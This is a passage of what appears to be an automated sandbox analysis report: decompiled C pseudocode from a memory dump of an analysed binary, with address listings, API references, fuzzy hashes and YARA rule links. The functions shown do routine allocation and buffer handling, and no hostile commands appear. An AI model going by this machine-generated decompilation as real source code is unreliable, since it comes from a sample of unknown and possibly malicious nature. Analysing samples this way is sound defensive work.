								E00162034(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0016C9F6(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00166DC1(__eflags, 0x1e, _t151 + 0x24);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00166DC1(_t156, 0x1d, _t151 + 0x24);
					E00166FC6(0x1a0f50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x00163b3d
0x00163b3d
0x00163b42
0x00163b4c
0x00163b52
0x00163b54
0x00163b5b
0x00163b79
0x00163b80
0x00163dc2
0x00163dc8
0x00000000
0x00163dc8
0x00163b88
0x00163b99
0x00163b9f
0x00000000
0x00000000
0x00163bab
0x00163bab
0x00163bb1
0x00163bc2
0x00163bc3
0x00163bcc
0x00163bd1
0x00163bd8
0x00163bdd
0x00163bec
0x00163bef
0x00163bf4
0x00163bf7
0x00163bfa
0x00163c4f
0x00163c4f
0x00163c55
0x00163cb1
0x00163cbf
0x00163cd3
0x00163ce0
0x00163ce6
0x00163cec
0x00163cf4
0x00163cfa
0x00163d06
0x00163d12
0x00163d15
0x00163d18
0x00163d1e
0x00163d24
0x00163d2a
0x00163d30
0x00163d36
0x00163d3c
0x00163d55
0x00163d3e
0x00163d3e
0x00163d3f
0x00163d40
0x00163d41
0x00163d41
0x00163d6f
0x00163d71
0x00163d80
0x00163d82
0x00163daf
0x00163d84
0x00163d91
0x00163d9d
0x00163da2
0x00163da4
0x00163da8
0x00163da8
0x00163da4
0x00163db1
0x00163db7
0x00163dbd
0x00000000
0x00163dbf
0x00163c57
0x00163c5d
0x00163c63
0x00000000
0x00000000
0x00163c8c
0x00163c95
0x00163c95
0x00163cac
0x00000000
0x00163cac
0x00163bfc
0x00163c02
0x00163c22
0x00163c22
0x00163c24
0x00163c37
0x00163c4a
0x00163c26
0x00163c26
0x00163c26
0x00000000
0x00163c24
0x00163c04
0x00163c12
0x00163c18
0x00000000
0x00163c18
0x00163c06
0x00163c10
0x00000000
0x00000000
0x00000000
0x00163c10
0x00163bb3
0x00163bb9
0x00000000
0x00163bbb
0x00163bbb
0x00000000
0x00163bbb
0x00163b5d
0x00163b63
0x00163b6f
0x00163dcd
0x00163dcd
0x00163dcf
0x00163dd3
0x00163ddd
0x00163ddd

APIs

__EH_prolog.LIBCMT ref: 00163B42

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7d61c4086a2a24cd4e47806473b8488f8b1a03846cb5b1d1c57f03851a54c1e4
Instruction ID: 8c043718ffd320e734888d0f34ac54b3bcac61fc21bef16786eac4eaa7d3e85f
Opcode Fuzzy Hash: 7d61c4086a2a24cd4e47806473b8488f8b1a03846cb5b1d1c57f03851a54c1e4
Instruction Fuzzy Hash: E571E271104F44AEDB25DB70CC51AE7B7E8AF24301F44896EE5EB47242DB326A68CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0016837F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0016837F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0017E28C(E00191E2A, _t95);
				E0017E360();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00161380(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00169EF7(_t6, __edi, _t93, _t93 + 0xf6) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E001619A6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d34; // -38196
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0016FE56(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0016BAC4(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E001670BF(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0016A4C6(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00168517(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82fa) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x6201)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82fa)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82fa)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x6201));
								_t32 =  *((char*)(_t51 + 0x6201)) == 0;
								__eflags =  *((char*)(_t51 + 0x6201)) == 0;
								E00171359((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf6);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00161F00(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00163AAC(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E0016857B(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00166FC6(0x1a0f50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00161631(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x0016837f
0x0016837f
0x0016837f
0x0016837f
0x00168384
0x0016838e
0x00168394
0x00168396
0x0016839f
0x001683a4
0x001683af
0x001683bc
0x001683c4
0x001683ca
0x001683d1
0x001683e4
0x001683eb
0x001683f2
0x001683f5
0x001683f7
0x001683fd
0x00168404
0x0016840b
0x00168412
0x00168417
0x00168432
0x0016843e
0x00168445
0x0016844a
0x00168450
0x00168455
0x00168457
0x0016845e
0x00168465
0x0016846a
0x0016846c
0x00000000
0x00000000
0x0016841f
0x00168425
0x0016842b
0x0016842b
0x0016846e
0x00168474
0x00168474
0x0016847a
0x00168483
0x00168488
0x0016848d
0x0016848e
0x0016848f
0x00168497
0x0016849a
0x001684a1
0x001684a1
0x0016849c
0x0016849c
0x0016849f
0x00000000
0x00000000
0x0016849f
0x001684a8
0x001684ab
0x001684b2
0x001684b4
0x001684c2
0x001684c2
0x001684c9
0x001684c9
0x001684ce
0x001684d4
0x001684d9
0x001684d9
0x001684df
0x001684e4
0x001684e9
0x001684f2
0x001684f7
0x001684f7
0x001684d9
0x001683d3
0x001683da
0x001683da
0x001683d1
0x001684fb
0x00168501
0x0016850c
0x00168516

APIs

__EH_prolog.LIBCMT ref: 00168384

Part of subcall function 00161380: __EH_prolog.LIBCMT ref: 00161385
Part of subcall function 00161380: new.LIBCMT ref: 001613FE

Part of subcall function 001619A6: __EH_prolog.LIBCMT ref: 001619AB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0d2b2420cd909a70961ff71f319f6cb865c12ad6777b8526e9a317eb5018497d
Instruction ID: ff64ec3cc6c2d036b5375554e5be633348282161bc7f2002e854866787494c90
Opcode Fuzzy Hash: 0d2b2420cd909a70961ff71f319f6cb865c12ad6777b8526e9a317eb5018497d
Instruction Fuzzy Hash: 6A41A031840658AADF24EB60CC55BFAB3B8AF64304F0441EAE58AA7093DF755AD8DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00161E00, Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00161E00(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0017E28C(E00191CCB, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00163B3D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E001616D2(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00161849(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E0017137A( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E001713F5( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00171430();
					}
					E00161849(_t68, E001835B3( *_t68));
					_t49 = 1;
				}
				E001615A0(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00161e00
0x00161e00
0x00161e05
0x00161e0e
0x00161e12
0x00161e15
0x00161e18
0x00161e1b
0x00161e1e
0x00161e21
0x00161e29
0x00161e2f
0x00161e36
0x00161e3e
0x00161e46
0x00161e51
0x00161e54
0x00161e58
0x00161e5e
0x00161e63
0x00161e6d
0x00161e85
0x00161ea6
0x00161e87
0x00161e87
0x00161e8f
0x00161e98
0x00161e98
0x00161e6f
0x00161e6f
0x00161e72
0x00161e74
0x00161e77
0x00161e77
0x00161eb6
0x00161ebc
0x00161ebe
0x00161ec2
0x00161ecd
0x00161ed7

APIs

__EH_prolog.LIBCMT ref: 00161E05

Part of subcall function 00163B3D: __EH_prolog.LIBCMT ref: 00163B42

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f9702d90ea3ee8b5d2798e079c80a2104f3755ab22f5750f4e2e65e61d89b08e
Instruction ID: ca526fa9a10995c23999fef4e1b005d6f8b087e4203562296f25ea67c69a37e0
Opcode Fuzzy Hash: f9702d90ea3ee8b5d2798e079c80a2104f3755ab22f5750f4e2e65e61d89b08e
Instruction Fuzzy Hash: FC212B72944209AFCF15EF99DD519EEFBF6BF68300B14446EE849A7251CB325E20CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0017A7C3, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0017A7C3(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				short _t38;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0017E28C(E00192029, _t62);
				_push(_t47);
				E0017E360();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00161380(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00161F4F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00161951(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2); // executed
						_t38 = E001835D3(_t50); // executed
						_t55 = _t38;
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0017F4B0(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E001615E7(_t62 - 0x24);
					E00161631(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00161631(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x0017a7c3
0x0017a7c3
0x0017a7c3
0x0017a7c8
0x0017a7cd
0x0017a7d3
0x0017a7d9
0x0017a7da
0x0017a7dd
0x0017a7e7
0x0017a7ea
0x0017a7f8
0x0017a7fc
0x0017a807
0x0017a818
0x0017a81b
0x0017a81e
0x0017a821
0x0017a824
0x0017a82a
0x0017a82e
0x0017a82f
0x0017a835
0x0017a83a
0x0017a83c
0x0017a83e
0x0017a841
0x0017a847
0x0017a848
0x0017a84e
0x0017a853
0x0017a855
0x0017a857
0x0017a85d
0x0017a860
0x0017a868
0x0017a859
0x0017a859
0x0017a859
0x0017a873
0x0017a873
0x0017a878
0x0017a883
0x0017a888
0x0017a809
0x0017a80f
0x0017a814
0x0017a814
0x0017a88f
0x0017a89a

APIs

__EH_prolog.LIBCMT ref: 0017A7C8

Part of subcall function 00161380: __EH_prolog.LIBCMT ref: 00161385
Part of subcall function 00161380: new.LIBCMT ref: 001613FE

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a95db281d06e064122d6264107be9323acadb28708bb616f31c0725b7ab6adde
Instruction ID: 100820386b1f875f3241839e0f301489d34771d76f326189fd6ea506a6f55f26
Opcode Fuzzy Hash: a95db281d06e064122d6264107be9323acadb28708bb616f31c0725b7ab6adde
Instruction Fuzzy Hash: C2216B71C04249AACF14DF94C9429EEBBF4AF69304F5444EEE809A7202DB356E16CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001692E6, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001692E6(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0017E28C(E00191F37, _t42);
				E0016709D(_t42 - 0x20, E00167DC6());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0016CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0016CC51( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E0016CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E001615A0(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x001692e6
0x001692eb
0x001692fd
0x0016930b
0x00169314
0x00169318
0x0016931b
0x0016931f
0x00169322
0x00169322
0x00169324
0x00169325
0x00169327
0x0016932f
0x0016932f
0x00169333
0x0016933c
0x00169343
0x00169344
0x00169346
0x00169346
0x00169356
0x00169358
0x0016935d
0x00169361
0x0016936a
0x00169374

APIs

__EH_prolog.LIBCMT ref: 001692EB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7075dcb9f7e135d2af0771fb0900beb552abf8912e877231f9404c8b3fbcaefd
Instruction ID: 129dc7375c5ea640be1df8b1ade2f5621c6458d424fc694769317ac73586bb59
Opcode Fuzzy Hash: 7075dcb9f7e135d2af0771fb0900beb552abf8912e877231f9404c8b3fbcaefd
Instruction Fuzzy Hash: A5115E73A10528ABCF22AEA8CC519EEB77ABF98750F054155F805B7391DB358D2186E0

Uniqueness

Uniqueness Score: -1.00%

Function 0018BB8A, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0018BB8A(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E001885A9(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E0018A6CA(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E001884DE(0);
				return _t32;
			}

0x0018bb8f
0x0018bb90
0x0018bb97
0x0018bb9c
0x0018bba0
0x0018bba4
0x0018bba7
0x0018bbad
0x0018bbad
0x0018bbb3
0x0018bbb5
0x0018bbb8
0x0018bbb8
0x0018bbbb
0x0018bbbd
0x0018bbc3
0x0018bbc7
0x0018bbcc
0x0018bbd0
0x0018bbd2
0x0018bbd5
0x0018bbdb
0x0018bbe2
0x0018bbe6
0x0018bbea
0x0018bbed
0x0018bbed
0x0018bbf1
0x0018bbf4
0x0018bba9
0x0018bba9
0x0018bba9
0x0018bbf6
0x0018bc03

APIs

Part of subcall function 001885A9: RtlAllocateHeap.NTDLL(00000008,00193958,00000000,?,0018905A,00000001,00000364,?,?,?,0016D25E,?,03248F10,00000063,00000004,0016CFE0), ref: 001885EA

_free.LIBCMT ref: 0018BBF6

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction ID: 7cc65d4cb583057fe449f2838bd6794f2d62f7bf2adb9435ece82c46628c444c
Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction Fuzzy Hash: 460149732043496BE3319F65D88195AFBE9FB85330F25052DE194832C0EB30AA05CB74

Uniqueness

Uniqueness Score: -1.00%

Function 0016AA88, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0016AA88(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E0017E24A(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E0016A8E1(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E001659CB( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}

0x0016aa8b
0x0016aa8d
0x0016aa8f
0x0016aa93
0x0016aa9a
0x0016aa9f
0x0016aaa3
0x0016aaa5
0x0016aab0
0x0016aab0
0x0016aaa7
0x0016aaa9
0x0016aaa9
0x0016aab2
0x0016aab2
0x0016aab5
0x0016aab8
0x0016aabd
0x0016aabf
0x0016aabf
0x0016aac6
0x0016aac8
0x0016aac8
0x0016aacf
0x0016aad4
0x0016aad4
0x0016aad9
0x0016aadf
0x0016aae3
0x0016aae3
0x0016aae4
0x0016aaeb

APIs

new.LIBCMT ref: 0016AA9A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 97725220b4a58c3e9c89911c7f83d4ef2c5d588a70c1518509fa1aa511c7e80f
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: FCF08C315007059FDB30DEA4CE41616B7E8EF25320F60891BE49AE3680E770E8A0CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001885A9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E001885A9(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x1c16ec, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00188394();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0018895A())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E001871AD(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x001885a9
0x001885af
0x001885b4
0x001885c2
0x001885c2
0x001885c8
0x001885ca
0x001885ca
0x001885e1
0x001885ea
0x001885f2
0x00000000
0x00000000
0x001885d2
0x001885d4
0x001885f6
0x001885fb
